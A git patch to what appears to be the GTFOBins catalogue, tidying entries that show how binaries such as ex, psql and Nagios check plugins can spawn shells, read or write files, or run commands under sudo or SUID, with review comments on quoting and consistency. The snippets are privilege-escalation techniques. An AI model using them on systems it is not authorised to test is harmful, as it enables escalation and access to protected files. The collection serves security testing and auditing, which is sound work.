From 764b2685bc05cf350b4f2ece0e6439d7eda6158e Mon Sep 17 00:00:00 2001
From: Emanuel Duss
Date: Fri, 13 Nov 2020 11:56:48 +0100
Subject: [PATCH] Syntax cleanup, removed some non-working SUID entries
---
 _gtfobins/check_by_ssh.md | 24 ++++++++----------------
 _gtfobins/check_cups.md | 8 ++------
 _gtfobins/check_log.md | 16 ++++------------
 _gtfobins/check_memory.md | 8 ++------
 _gtfobins/check_raid.md | 8 ++------
 _gtfobins/check_ssl_cert.md | 34 +++++++++++++---------------------
 _gtfobins/check_statusfile.md | 8 ++------
 _gtfobins/column.md | 6 +++---
 _gtfobins/ex.md | 8 ++++----
 _gtfobins/psql.md | 14 +++++++-------
 _gtfobins/rev.md | 6 +++---
 _gtfobins/ss.md | 6 +++---
 _gtfobins/ssh-keyscan.md | 6 +++---
 _gtfobins/tbl.md | 6 +++---
 _gtfobins/troff.md | 6 +++---
 _gtfobins/xmodmap.md | 6 +++---
 16 files changed, 65 insertions(+), 105 deletions(-)
diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md
index dedf47b..e00730e 100644
--- a/_gtfobins/check_by_ssh.md
+++ b/_gtfobins/check_by_ssh.md
@@ -4,26 +4,18 @@ description: |
 functions:
 command:
 - code: |
- COMMAND='/usr/bin/id'
- OUTPUT="output_file"
+ COMMAND=id
+ OUTPUT=output_file
 TF=$(mktemp)
- echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
- check_by_ssh -F "$TF" -H localhost -C something
- cat $OUTPUT
- suid:
- - code: |
- COMMAND='/usr/bin/id'
- OUTPUT="output_file"
- TF=$(mktemp)
- echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
- check_by_ssh -F "$TF" -H localhost -C something
+ echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF
+ check_by_ssh -F $TF -H localhost -C something
 cat $OUTPUT
 sudo:
 - code: |
- COMMAND='/usr/bin/id'
- OUTPUT="output_file"
+ COMMAND=id
+ OUTPUT=output_file
 TF=$(mktemp)
- echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
- check_by_ssh -F "$TF" -H localhost -C something
+ echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF
+ sudo check_by_ssh -F $TF -H localhost -C something
 cat $OUTPUT
 ---
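Review bot: Dropping the double quotes leaves `$TF` and `$OUTPUT` unquoted in `check_by_ssh -F $TF …`, `> $TF` and `cat $OUTPUT`, so each value undergoes word splitting and pathname expansion as soon as a reader replaces the placeholder with a path that contains spaces or glob characters. The same applies to the `$LFILE`, `$INPUT`, `$OUTPUT` and `$TF` expansions in every other file this patch touches (check_cups through xmodmap). If unquoted placeholders are the intended house style, that assumption should be stated once for the collection; otherwise keep the quoted form, e.g. `check_by_ssh -F "$TF" -H localhost -C something`.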
diff --git a/_gtfobins/check_cups.md b/_gtfobins/check_cups.md
index 841ec51..225e2ae 100644
--- a/_gtfobins/check_cups.md
+++ b/_gtfobins/check_cups.md
@@ -5,13 +5,9 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- check_cups --extra-opts=@"$LFILE"
- suid:
- - code: |
- LFILE=file_to_read
- ./check_cups --extra-opts=@"$LFILE"
+ check_cups --extra-opts=@$LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo check_cups --extra-opts=@"$LFILE"
+ sudo check_cups --extra-opts=@$LFILE
 ---
diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md
index f869ad4..023cdbd 100644
--- a/_gtfobins/check_log.md
+++ b/_gtfobins/check_log.md
@@ -6,25 +6,17 @@ functions:
 - code: |
 LFILE=file_to_read
 OUTPUT=output_file
- umask 022
- check_log -F "$LFILE" -O "$OUTPUT"
- cat "$OUTPUT"
+ check_log -F $LFILE -O $OUTPUT
+ cat $OUTPUT
 file-write:
 - code: |
 LFILE=file_to_write
 INPUT=output_file
- umask 022
- check_log -F "$INPUT" -O "$LFILE"
- suid:
- - code: |
- LFILE=file_to_write
- INPUT=output_file
- umask 022
- ./check_log -F "$INPUT" -O "$LFILE"
+ check_log -F $INPUT -O $LFILE
 sudo:
 - code: |
 LFILE=file_to_write
 INPUT=output_file
 umask 022
- sudo check_log -F "$INPUT" -O "$LFILE"
+ sudo check_log -F $INPUT -O $LFILE
 ---
diff --git a/_gtfobins/check_memory.md b/_gtfobins/check_memory.md
index d04333a..8ca90eb 100644
--- a/_gtfobins/check_memory.md
+++ b/_gtfobins/check_memory.md
@@ -5,13 +5,9 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- check_memory --extra-opts=@"$LFILE"
- suid:
- - code: |
- LFILE=file_to_read
- ./check_memory --extra-opts=@"$LFILE"
+ check_memory --extra-opts=@$LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo check_memory --extra-opts=@"$LFILE"
+ sudo check_memory --extra-opts=@$LFILE
 ---
diff --git a/_gtfobins/check_raid.md b/_gtfobins/check_raid.md
index 2c7c775..ef1e823 100644
--- a/_gtfobins/check_raid.md
+++ b/_gtfobins/check_raid.md
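Review bot: In check_log.md `umask 022` is removed from the `file-read` and `file-write` snippets but kept as a context line in the `sudo` one, so the entries now differ in a way the commit message does not explain. Which mode the output file gets depends on the umask in effect, and under sudo the caller's umask may be adjusted by policy, so the hunk alone does not show which entry actually needs the line. Either drop it from `sudo` too or keep it wherever it matters and say why in a `description:` field on that entry.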
@@ -5,13 +5,9 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- check_raid --extra-opts=@"$LFILE"
- suid:
- - code: |
- LFILE=file_to_read
- ./check_raid --extra-opts=@"$LFILE"
+ check_raid --extra-opts=@$LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo check_raid --extra-opts=@"$LFILE"
+ sudo check_raid --extra-opts=@$LFILE
 ---
diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md
index 2e5916d..2401373 100644
--- a/_gtfobins/check_ssl_cert.md
+++ b/_gtfobins/check_ssl_cert.md
@@ -3,32 +3,24 @@ description: |
 This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
 functions:
 command:
- - code: |
- COMMAND='/usr/bin/id'
- OUTPUT="output_file"
+ - description: The host example.net must return a certificate via TLS
+ code: |
+ COMMAND=id
+ OUTPUT=output_file
 TF=$(mktemp)
- echo "$COMMAND | tee \"$OUTPUT\"" > $TF
+ echo "$COMMAND | tee $OUTPUT" > $TF
 chmod +x $TF
- check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS
- cat $OUTPUT
- suid:
- - code: |
- COMMAND='/usr/bin/id'
- OUTPUT="output_file"
- umask 022
- TF=$(mktemp)
- echo "$COMMAND | tee \"$OUTPUT\"" > $TF
- chmod +x $TF
- ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS
+ check_ssl_cert --curl-bin $TF -H example.net
 cat $OUTPUT
 sudo:
- - code: |
- COMMAND='/usr/bin/id'
- OUTPUT="output_file"
- umask 022
+ - description: The host example.net must return a certificate via TLS
+ code: |
+ COMMAND=id
+ OUTPUT=output_file
 TF=$(mktemp)
- echo "$COMMAND | tee \"$OUTPUT\"" > $TF
+ echo "$COMMAND | tee $OUTPUT" > $TF
 chmod +x $TF
- sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS
+ umask 022
+ check_ssl_cert --curl-bin $TF -H example.net
 cat $OUTPUT
 ---
diff --git a/_gtfobins/check_statusfile.md b/_gtfobins/check_statusfile.md
index 1812112..dbb297b 100644
--- a/_gtfobins/check_statusfile.md
+++ b/_gtfobins/check_statusfile.md
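Review bot: In check_ssl_cert.md the rewritten `sudo:` entry no longer runs the plugin through sudo: the removed line was `sudo check_ssl_cert --curl-bin "$TF" …` and its replacement is `check_ssl_cert --curl-bin $TF -H example.net`, which makes the section identical to `command:` apart from the umask line, while the check_by_ssh hunk in this same patch goes the other way and adds the prefix. The line should read `sudo check_ssl_cert --curl-bin $TF -H example.net`. `umask 022` has also moved below `chmod +x $TF` in that entry, which looks unintended given it was dropped from the other snippets. Separately, the context line at the top of the hunk still describes this file as the `check_by_ssh` plugin and should name `check_ssl_cert`.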
@@ -5,13 +5,9 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- check_statusfile "$LFILE"
- suid:
- - code: |
- LFILE=file_to_read
- ./check_statusfile "$LFILE"
+ check_statusfile $LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo check_statusfile "$LFILE"
+ sudo check_statusfile $LFILE
 ---
diff --git a/_gtfobins/column.md b/_gtfobins/column.md
index 078ec55..af67980 100644
--- a/_gtfobins/column.md
+++ b/_gtfobins/column.md
@@ -3,13 +3,13 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- column "$LFILE"
+ column $LFILE
 suid:
 - code: |
 LFILE=file_to_read
- ./column "$LFILE"
+ ./column $LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo column "$LFILE"
+ sudo column $LFILE
 ---
diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md
index 8063c4e..1029504 100644
--- a/_gtfobins/ex.md
+++ b/_gtfobins/ex.md
@@ -3,7 +3,7 @@ functions:
 shell:
 - code: |
 ex
- !/bin/sh
+ !sh
 file-write:
 - code: |
 ex file_to_write
@@ -20,9 +20,9 @@ functions:
 sudo:
 - code: |
 sudo ex
- !/bin/sh
- limited-suid:
+ !sh
+ suid:
 - code: |
 ./ex
- !/bin/sh
+ !sh -p
 ---
diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md
index f2a9b74..ae7b794 100644
--- a/_gtfobins/psql.md
+++ b/_gtfobins/psql.md
@@ -4,15 +4,15 @@ functions:
 - code: |
 psql
 \?
- !/bin/sh
- sudo:
- - code: |
- psql
- \?
- !/bin/sh
+ !sh
 suid:
 - code: |
 psql
 \?
- !/bin/sh
+ !sh -p
+ sudo:
+ - code: |
+ psql
+ \?
+ !sh
 ---
diff --git a/_gtfobins/rev.md b/_gtfobins/rev.md
index 7fe91c3..4e27759 100644
--- a/_gtfobins/rev.md
+++ b/_gtfobins/rev.md
@@ -3,13 +3,13 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- rev "$LFILE" | rev
+ rev $LFILE | rev
 suid:
 - code: |
 LFILE=file_to_read
- ./rev "$LFILE" | rev
+ ./rev $LFILE | rev
 sudo:
 - code: |
 LFILE=file_to_read
- sudo rev "$LFILE" | rev
+ sudo rev $LFILE | rev
 ---
diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md
index 082acd4..28d4bce 100644
--- a/_gtfobins/ss.md
+++ b/_gtfobins/ss.md
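Review bot: The second ex.md hunk reclassifies the entry from `limited-suid` to `suid` and changes the line to `!sh -p`, which alters what the page asserts rather than its syntax, and the commit subject does not mention it. The claim rests on how the host's `sh` treats `-p`, which nothing in the hunk establishes. A `description:` line stating that assumption, in the way the check_ssl_cert entries of this patch state their TLS requirement, would let readers auditing SUID binaries judge whether the entry applies to their systems.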
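Review bot: In psql.md both privileged entries invoke plain `psql`: the `suid:` snippet lacks the `./` form used by the other SUID entries in this patch (`./ex`, `./column`) and the re-added `sudo:` snippet lacks the `sudo` prefix used elsewhere (`sudo ex`). As written the three psql snippets differ only by `-p`, so the page does not show which invocation each section refers to. For consistency with the rest of the collection the first line should be `./psql` under `suid:` and `sudo psql` under `sudo:`.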
@@ -5,13 +5,13 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- ss -a -F "$LFILE"
+ ss -a -F $LFILE
 suid:
 - code: |
 LFILE=file_to_read
- ./ss -a -F "$LFILE"
+ ./ss -a -F $LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo ss -a -F "$LFILE"
+ sudo ss -a -F $LFILE
 ---
diff --git a/_gtfobins/ssh-keyscan.md b/_gtfobins/ssh-keyscan.md
index 3f7f1d7..e5bb84c 100644
--- a/_gtfobins/ssh-keyscan.md
+++ b/_gtfobins/ssh-keyscan.md
@@ -5,13 +5,13 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- ssh-keyscan -f "$LFILE"
+ ssh-keyscan -f $LFILE
 suid:
 - code: |
 LFILE=file_to_read
- ./ssh-keyscan -f "$LFILE"
+ ./ssh-keyscan -f $LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo ssh-keyscan -f "$LFILE"
+ sudo ssh-keyscan -f $LFILE
 ---
diff --git a/_gtfobins/tbl.md b/_gtfobins/tbl.md
index f78c5b8..93ec6fa 100644
--- a/_gtfobins/tbl.md
+++ b/_gtfobins/tbl.md
@@ -5,13 +5,13 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- tbl "$LFILE"
+ tbl $LFILE
 suid:
 - code: |
 LFILE=file_to_read
- ./tbl "$LFILE"
+ ./tbl $LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo tbl "$LFILE"
+ sudo tbl $LFILE
 ---
diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md
index 82f59c3..52a2bdc 100644
--- a/_gtfobins/troff.md
+++ b/_gtfobins/troff.md
@@ -5,13 +5,13 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- troff "$LFILE"
+ troff $LFILE
 suid:
 - code: |
 LFILE=file_to_read
- ./troff "$LFILE"
+ ./troff $LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo troff "$LFILE"
+ sudo troff $LFILE
 ---
diff --git a/_gtfobins/xmodmap.md b/_gtfobins/xmodmap.md
index 8c32456..8d23cb1 100644
--- a/_gtfobins/xmodmap.md
+++ b/_gtfobins/xmodmap.md
@@ -5,13 +5,13 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- xmodmap -v "$LFILE"
+ xmodmap -v $LFILE
 suid:
 - code: |
 LFILE=file_to_read
- ./xmodmap -v "$LFILE"
+ ./xmodmap -v $LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- sudo xmodmap -v "$LFILE"
+ sudo xmodmap -v $LFILE
 ---